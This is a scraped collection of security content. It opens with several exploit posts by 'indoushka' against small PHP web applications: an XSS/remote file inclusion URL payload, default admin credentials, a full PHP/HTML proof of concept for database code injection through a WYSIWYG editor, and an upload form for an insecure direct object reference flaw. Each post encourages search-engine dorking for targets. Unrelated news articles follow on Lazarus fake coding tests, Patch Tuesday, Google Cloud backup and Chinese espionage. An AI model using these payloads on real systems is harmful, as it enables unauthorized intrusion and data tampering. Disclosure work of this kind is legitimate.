Online Survey System version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

Posted Sep 11, 2024

Authored by indoushka

Online Survey System version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, xss, file inclusion

SHA-256 | 0573d4aa4fad74ba21dfae8c95d8a0ef8922ce6bbbf5c65fcd1a8b98424e3d9e

Download | Favorite | View

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

    =============================================================================================================================================| # Title     : Online Survey System 1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg[+] http://127.0.0.1/survey/index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion

Online Birth Certificate System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Online Birth Certificate System 1.0 Insecure Settings Vulnerability                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/obcs/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Online Birth Certificate System 1.0 Insecure Settings

Medical Card Generations System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Medical Card Generations System 1.0 Insecure Settings Vulnerability                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/mcgs/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Medical Card Generations System 1.0 Insecure Settings

Emergency Ambulance Hiring Portal version 1.0 suffer from a WYSIWYG code injection vulnerability.

=============================================================================================================================================  
| # Title     : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . 

   [+] Line 2  :  Make sure to include your database connection here

[+] Line 44 :  Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload : 

<?php  
include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {  
    $pagetitle = $_POST['pagetitle'];  
    $pagedes = $con->real_escape_string($_POST['pagedes']);  
    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");

    if ($query) {  
        echo '<script>alert("About Us has been updated.")</script>';  
    } else {  
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
    }  
    exit;  
}  
?>

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushka | Update About Us Content</title>  
      
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
    <script type="text/javascript">  
        // Apply NicEdit to all text areas when the DOM is loaded  
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript  
        function submitForm(event) {  
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;  
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent  
            const formData = new FormData();  
            formData.append('pagetitle', pagetitle);  
            formData.append('pagedes', pagedes);  
            formData.append('submit', true);

            // Send the form data using fetch API  
            fetch('http://127.0.0.1/eahp/admin/about-us.php', {  
                method: 'POST',  
                body: formData,  
            })  
            .then(response => response.text())  
            .then(data => {  
                alert('About Us content has been updated successfully.');  
                console.log(data); // Handle the response from the server  
            })  
            .catch(error => {  
                console.error('Error:', error);  
            });  
        }  
    </script>  
    <style>  
        /* Center the form container */  
        .editor-container {  
            max-width: 800px;  
            margin: 0 auto; /* Center horizontally */  
            padding: 20px;  
            text-align: center; /* Center the content inside */  
        }

        /* Ensure the textarea takes the full width */  
        #pagedes {  
            width: 100%;  
            height: 300px;  
            margin: 0 auto;  
        }  
    </style>  
</head>  
<body>  
    <div id="app">  
        <div class="app-content">  
            <div class="main-content">  
                <div class="wrap-content container" id="container">  
                      
                    <section id="page-title">  
                        <div class="row">  
                            <div class="col-sm-8">  
                                <h1 class="mainTitle">Update the About Us Content</h1>  
                            </div>

                                                          </li>  
                            </ol>  
                        </div>  
                    </section>  
                      
                    <div class="container-fluid container-fullw bg-white">  
                        <div class="row">  
                            <div class="col-md-12">  
                                  
                                <div class="editor-container">  
                                    <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                        <div class="form-group">  
                                            <label for="pagetitle">Page Title</label>  
                                            <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                        </div>  
                                        <div class="form-group">  
                                            <label for="pagedes">Page Description</label>  
                                              
                                            <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                        </div>  
                                        <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                    </form>  
                                </div>  
                            </div>  
                        </div>  
                    </div>  
                      
                </div>  
            </div>  
        </div>  
    </div>  
      
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Emergency Ambulance Hiring Portal 1.0 WYSIWYG Code Injection

Printable Staff ID Card Creator System version 1.0 suffers from an insecure direct object reference vulnerability.

=============================================================================================================================================  
| # Title     : printable staff id card creator system 1.0 idor Vulnerability                                                               |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .

[+] Line : 8 Set your Target

[+] Save As poc.html

[+] payload :

<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">  
      <div class="modal-header" style="background:#222d32">  
        <button type="button" class="close" data-dismiss="modal">×</button>  
        <h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>  
          SYSTEM INFORMATION INITIALISATION  
          </center></h4>  
      </div>  
        <form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">            

      <div class="modal-body">           
        <center>   
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>  
              <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>  
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>  
                  Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">  
                                      <input type="hidden" name="page" value="admin.php">                                                                      
         </center>  
      </div>  
      <div class="modal-footer">  
        <input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;  
        <button type="button" class="btn btn-success" data-dismiss="modal">Close</button>  
      </div>  
      </form></div>

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Printable Staff ID Card Creator System 1.0 Insecure Direct Object Reference

Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments.
"The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said.
The activity has been assessed to be part of

Malware / Software Development

Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments.

"The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said.

The activity has been assessed to be part of an ongoing campaign dubbed VMConnect that first came to light in August 2023. There are indications that it is the handiwork of the North Korea-backed Lazarus Group.

The use of job interviews as an infection vector has been adopted widely by North Korean threat actors, either approaching unsuspecting developers on sites such as LinkedIn or tricking them into downloading rogue packages as part of a purported skills test.

These packages, for their part, have been published directly on public repositories like npm and PyPI, or hosted on GitHub repositories under their control.

ReversingLabs said it identified malicious code embedded within modified versions of legitimate PyPI libraries such as pyperclip and pyrebase.

"The malicious code is present in both the \_\_init\_\_.py file and its corresponding compiled Python file (PYC) inside the \_\_pycache\_\_ directory of respective modules," Zanki said.

It's implemented in the form of a Base64-encoded string that obscures a downloader function that establishes contact with a command-and-control (C2) server in order to execute commands received as a response.

In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.

This makes it "more likely that he or she would execute the package without performing any type of security or even source code review first," Zanki said, adding "that ensures the malicious actors behind this campaign that the embedded malware would be executed on the developer's system."

Some of the aforementioned tests claimed to be a technical interview for financial institutions like Capital One and Rookery Capital Limited, underscoring how the threat actors are impersonating legitimate companies in the sector to pull off the operation.

It's currently not clear how widespread these campaigns are, although prospective targets are scouted and contacted using LinkedIn, as recently also highlighted by Google-owned Mandiant.

"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user's macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said.

The development comes as cybersecurity company Genians revealed that the North Korean threat actor codenamed Konni is intensifying its attacks against Russia and South Korea by employing spear-phishing lures that lead to the deployment of AsyncRAT, with overlaps identified with a campaign codenamed CLOUD#REVERSER (aka puNK-002).

Some of these attacks also entail the propagation of a new malware called CURKON, a Windows shortcut (LNK) file that serves as a downloader for an AutoIt version of Lilith RAT. The activity has been linked to a sub-cluster tracked as puNK-003, per S2W.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.
The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech

Windows Security / Vulnerability

Microsoft on Tuesday disclosed that three new security flaws impacting the Windows platform have come under active exploitation as part of its Patch Tuesday update for September 2024.

The monthly security release addresses a total of 79 vulnerabilities, of which seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. This is aside from 26 flaws that the tech giant resolved in its Chromium-based Edge browser since last month's Patch Tuesday release.

The three vulnerabilities that have been weaponized in a malicious context are listed below, alongside a bug that Microsoft is treating as exploited -

*   **CVE-2024-38014** (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability
*   **CVE-2024-38217** (CVSS score: 5.4) - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability
*   **CVE-2024-38226** (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability
*   **CVE-2024-43491** (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability

"Exploitation of both CVE-2024-38226 and CVE-2024-38217 can lead to the bypass of important security features that block Microsoft Office macros from running," Satnam Narang, senior staff research engineer at Tenable, said in a statement.

"In both cases, the target needs to be convinced to open a specially crafted file from an attacker-controlled server. Where they differ is that an attacker would need to be authenticated to the system and have local access to it to exploit CVE-2024-38226."

As disclosed by Elastic Security Labs last month, CVE-2024-38217 – also referred to as LNK Stomping – is said to have been abused in the wild as far back as February 2018.

CVE-2024-43491, on the other hand, is notable for the fact that it's similar to the downgrade attack that cybersecurity company SafeBreach detailed early last month.

"Microsoft is aware of a vulnerability in Servicing Stack that has rolled back the fixes for some vulnerabilities affecting Optional Components on Windows 10, version 1507 (initial version released July 2015)," Redmond noted.

"This means that an attacker could exploit these previously mitigated vulnerabilities on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB) systems that have installed the Windows security update released on March 12, 2024 — KB5035858 (OS Build 10240.20526) or other updates released until August 2024."

The Windows maker further said it can be resolved by installing the September 2024 Servicing stack update (SSU KB5043936) and the September 2024 Windows security update (KB5043083), in that order.

It's also worth pointing out that Microsoft's "Exploitation Detected" assessment for CVE-2024-43491 stems from the rollback of fixes that addressed vulnerabilities impacting some Optional Components for Windows 10 (version 1507) that have been previously exploited.

"No exploitation of CVE-2024-43491 itself has been detected," the company said. "In addition, the Windows product team at Microsoft discovered this issue, and we have seen no evidence that it is publicly known."

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Arm
*   Bosch
*   Broadcom (including VMware)
*   Cisco
*   Citrix
*   CODESYS
*   D-Link
*   Dell
*   Drupal
*   F5
*   Fortinet
*   Fortra
*   GitLab
*   Google Android and Pixel
*   Google Chrome
*   Google Cloud
*   Google Wear OS
*   Hitachi Energy
*   HP
*   HP Enterprise (including Aruba Networks)
*   IBM
*   Intel
*   Ivanti
*   Lenovo
*   Linux distributions Amazon Linux, Debian, Oracle Linux, Red Hat, Rocky Linux, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MongoDB
*   Mozilla Firefox, Firefox ESR, Focus and Thunderbird
*   NVIDIA
*   ownCloud
*   Palo Alto Networks
*   Progress Software
*   QNAP
*   Qualcomm
*   Rockwell Automation
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SolarWinds
*   SonicWall
*   Spring Framework
*   Synology
*   Veeam
*   Zimbra
*   Zoho ManageEngine ServiceDesk Plus, SupportCenter Plus, and ServiceDesk Plus MSP
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues Patches for 79 Flaws, Including 3 Actively Exploited Windows Flaws

The combination of immutability, indelibility, centralized governance, and user empowerment provides a comprehensive backup strategy, Google said.

Source: Aleksei Gorodenkov via Alamy Stock Photo

Google has announced three enhancements to its Google Cloud Backup and Disaster recovery service to enhance customers' ability to manage backups simply and securely, while boosting agility and reducing the workload on IT teams.

Backup and disaster recovery technologies are key components of ransomware defense. The first enhancement allows users to create backup vault storage systems that cannot be modified or accidentally deleted. Backup vault data is stored in Google-managed projects and "logically air-gapped" from Google Cloud projects, the company stated in a blog post. Compute Engine virtual machines (VMs), VMware Engine VMs, Oracle databases, and SQL Server databases are supported.

Backup vault storage isn’t visible to users inside the organization, preventing direct attacks, and Google manages access through its Google Cloud Backup and DR service application programming interfaces (APIs) and user interface (UI). Users can set vault backup rules on modification and deletion when creating vaults. The backups are fully self-contained, giving users the opportunity for recovery when a source resource is no longer available, helping teams keep production applications online.

Google is also making updates to its centralized backup management system. Its new fully managed service is an integrated, developer-centric, self-service model that allows app developers to back up their VMs while the teams managing storage and backup systems retain governance and oversight. Monitoring and reporting capabilities include scheduled backup jobs and restore jobs, customizable reporting, and alerts and notifications. 

The system, integrated with Google Cloud Identity and Access Management (IAM), lets developers create backups during the creation of Compute Engine VMs so that users have correct data protection policies deployed from the outset of project creation. 

Both products are currently available in preview, Google said. The backup vault feature will be generally available in the coming months. During preview, users will be able to access these features through the UI and Google Cloud CLI to protect Compute Engine VMs. Once it is generally available, users will have access to APIs and Terraform.

**About the Author**

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

Google Updates Cloud Backup, Disaster Recovery Service

Microsoft's September 2024 Patch Tuesday is here. Make sure you’ve applied the necessary patches!

Microsoft September 2024 Patch Tuesday addresses 79 security vulnerabilities, including four actively exploited zero-days. It covers critical flaws in Windows Installer, MoTW, Publisher, and Windows Update.

Microsoft’s September 2024 Patch Tuesday is packed with critical updates, addressing a total of 79 vulnerabilities, including four actively exploited flaws and one publicly disclosed zero-day. Seven of these vulnerabilities were rated as critical, most of which were either remote code execution (RCE) or elevation of privileges (EoP) flaws.

****Highlighting Critical Vulnerabilities********1\. Actively Exploited Vulnerabilities:****

Among the most urgent updates were four vulnerabilities that were being actively exploited by malicious actors. These vulnerabilities represent a major risk to users and organizations that have yet to apply the patches, as they were being used in real-world attacks before the patches were available.

****CVE-2024-38217 – Windows Mark of the Web (MoTW) Security Feature Bypass Vulnerability:****

This critical vulnerability allows attackers to bypass security warnings meant to protect users from opening files from untrusted sources. Attackers can manipulate these security features to deceive users into executing malicious files without triggering the standard MoTW prompts. This vulnerability has previously been linked to ransomware attacks, making it a high-priority fix.

****CVE-2024-43461 – Windows MSHTML Platform Spoofing Vulnerability:****

This vulnerability enables attackers to spoof legitimate web content, which can be leveraged for phishing attacks and unauthorized data theft. This flaw shares similarities with CVE-2024-38112, which was used by advanced persistent threat (APT) groups in zero-day attacks. Given the active exploitation of related vulnerabilities, CVE-2024-43461 has a high likelihood of being used in future attacks.

****2\. Zero-Day Vulnerabilities:********CVE-2024-43491 — Remote Code Execution in Windows Update:****

This critical vulnerability could allow attackers to remotely execute code by exploiting weaknesses in the Windows Update process, gaining control of affected systems.

****CVE-2024-38014 — Elevation of Privilege in Windows Installer:****

This vulnerability allows attackers to gain elevated privileges by exploiting flaws in the Windows Installer, providing them with administrative-level access to compromised systems.

****CVE-2024-38217 — Windows Mark of the Web (MoTW) Bypass Vulnerability:****

Attackers can bypass the security mechanisms of MoTW, which are designed to alert users about harmful files downloaded from the internet, leading to unauthorized code execution.

****CVE-2024-38226 — Microsoft Publisher Security Bypass:****

This flaw allows attackers to exploit the security features in Microsoft Publisher, enabling them to execute malicious code by bypassing standard file protections.

****Critical Vulnerabilities Fixed****

Seven vulnerabilities were marked as critical, primarily involving remote code execution (RCE) or elevation of privilege. These vulnerabilities include:

*   **CVE-2024-43455** – Windows Remote Desktop Protocol (RDP) RCE vulnerability, which could allow attackers to remotely execute code on a compromised system, gaining full control of the machine.
*   **CVE-2024-43456** – Windows Kernel EoP vulnerability, allowing attackers to escalate their privileges on a targeted system, gaining administrative rights.
*   **CVE-2024-43469** – A high-severity remote code execution vulnerability in Azure CycleCloud, allowing attackers to execute arbitrary code with limited privileges. It has a CVSS score of 8.8, making patching critical to prevent exploitation

****Recommendations and Mitigation****

Given the critical nature of many of these vulnerabilities, especially the actively exploited and publicly disclosed flaws, Microsoft strongly recommends that organizations prioritize patch deployment.

**Patch Management:** Enterprises should accelerate their patch management processes to mitigate risks associated with vulnerabilities like CVE-2024-38217 and CVE-2024-43461. These flaws are being actively exploited in the wild, posing substantial risks to unpatched systems.

**User Education:** Beyond technical protection, users must be made aware of the dangers of interacting with untrusted files and websites. This is important in mitigating the MoTW and spoofing vulnerabilities discussed earlier.

The complete list of vulnerabilities, along with guidance on mitigation strategies, can be found here on Microsoft’s official September 2024 Patch Tuesday update.

Saeed Abbasi, Manager of Vulnerability Research at Qualys Threat Research Unit, commented on Microsoft’s September 2024 Patch Tuesday, stressing the importance of applying the updates promptly to mitigate possible risks.

“CVE-2024-38217 vulnerability allows an attacker to manipulate the security warnings that typically inform users about the risks of opening files from unknown or untrusted sources and similar MoTW bypasses have historically been linked to ransomware attacks, where the stakes are high,” Saeed warned.

He further stressed “Given the exploit’s public disclosure and confirmed exploitation, it is a prime vector for cybercriminals to infiltrate corporate networks. Enterprises must prioritize patch management and educate users on the risks of downloading files from untrusted sources to mitigate the exploitation of such vulnerabilities.”  

“The CVE-2024-43461 vulnerability mirrors the patterns of CVE-2024-38112 where the exploitation might be repurposed against CVE-2024-43461 due to the similar attack vectors involved. There exists a high likelihood of exploitation, as this vulnerability enables attackers to spoof legitimate web content, leading to unauthorized actions such as phishing and data theft,” he added.

“This risk is highlighted by past incidents where similar vulnerabilities were actively exploited in the wild, posing substantial security challenges to corporate networks. Given the critical nature of this vulnerability, we recommend fast-tracking patch management processes to mitigate potential impacts,” Saeed advised.

1.  **Mailcow Patches XSS and File Overwrite Flaws – Update NOW**
2.  **Google Patches Flaws in Quick Share After Researchers’ Warning**
3.  **Broadcom: Urgent Patch for Severe VMware vCenter Server Flaws**
4.  **TellYouThePass Ransomware Exploits Critical PHP Flaw, Patch NOW**
5.  **PATCH NOW! Veeam Flaw Puts Thousands of Backup Servers at Risk**

Microsoft September 2024 Patch Tuesday Fixes 79 Flaws, Including 4 Zero-Days

A trio of threat activity clusters linked to China has been observed compromising more government organizations in Southeast Asia as part of a renewed state-sponsored operation codenamed Crimson Palace, indicating an expansion in the scope of the espionage effort.
Cybersecurity firm Sophos, which has been monitoring the cyber offensive, said it comprises three intrusion sets tracked as Cluster

Malware / Cyber Espionage

A trio of threat activity clusters linked to China has been observed compromising more government organizations in Southeast Asia as part of a renewed state-sponsored operation codenamed **Crimson Palace**, indicating an expansion in the scope of the espionage effort.

Cybersecurity firm Sophos, which has been monitoring the cyber offensive, said it comprises three intrusion sets tracked as Cluster Alpha (STAC1248), Cluster Bravo (STAC1870), and Cluster Charlie (STAC1305). STAC is an abbreviation for "security threat activity cluster."

"The attackers consistently used other compromised organizational and public service networks in that region to deliver malware and tools under the guise of a trusted access point," security researchers Mark Parsons, Morgan Demboski, and Sean Gallagher said in a technical report shared with The Hacker News.

A noteworthy aspect of the attacks is that it entails the use of an unnamed organization's systems as a command-and-control (C2) relay point and a staging ground for tools. A second organization's compromised Microsoft Exchange Server is said to have been utilized to host malware.

Crimson Palace was first documented by the cybersecurity company in early June 2024, with the attacks taking place between March 2023 and April 2024.

While initial activity associated with Cluster Bravo, which overlaps with a threat group called Unfading Sea Haze, was confined to March 2023, a new attack wave detected between January and June 2024 has been observed targeting 11 other organizations and agencies in the same region.

A set of new attacks orchestrated by Cluster Charlie, a cluster that's referred to as Earth Longzhi, has also been identified between September 2023 and June 2024, some of which also involve the deployment of the C2 frameworks like Cobalt Strike, Havoc, and XieBroC2 in order to facilitate post-exploitation and deliver additional payloads like SharpHound for Active Directory infrastructure mapping.

"Exfiltration of data of intelligence value was still an objective after the resumption of activity," the researchers said. "However, much of their effort appeared to be focused on re-establishing and extending their foothold on the target network by bypassing EDR software and rapidly re-establishing access when their C2 implants had been blocked."

Another significant aspect is Cluster Charlie's heavy reliance on DLL hijacking to execute malware, an approach previously adopted by threat actors behind Cluster Alpha, indicating a "cross-pollination" of tactics.

Some of the other open-source programs used by the threat actor include RealBlindingEDR and Alcatraz, which allow for terminating antivirus processes and obfuscating portable executable files (e.g., .exe, .dll, and .sys) with an aim to fly under the radar.

Rounding off the cluster's malware arsenal is a previously unknown keylogger codenamed TattleTale that was originally identified in August 2023 and is capable of collecting Google Chrome and Microsoft Edge browser data.

"The malware can fingerprint the compromised system and check for mounted physical and network drives by impersonating a logged-on user," the researchers explained.

"TattleTale also collects the domain controller name and steals the LSA (Local Security Authority) Query Information Policy, which is known to contain sensitive information related to password policies, security settings, and sometimes cached passwords."

In a nutshell, the three clusters work hand in hand, while simultaneously focusing on specific tasks in the attack chain: infiltrating target environments and conducting reconnaissance (Alpha), burrow deep into the networks using various C2 mechanisms (Bravo), and exfiltrating valuable data (Charlie).

"Throughout the engagement, the adversary appeared to continually test and refine their techniques, tools, and practices," the researchers concluded. "As we deployed countermeasures for their bespoke malware, they combined the use of their custom-developed tools with generic, open-source tools often used by legitimate penetration testers, testing different combinations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google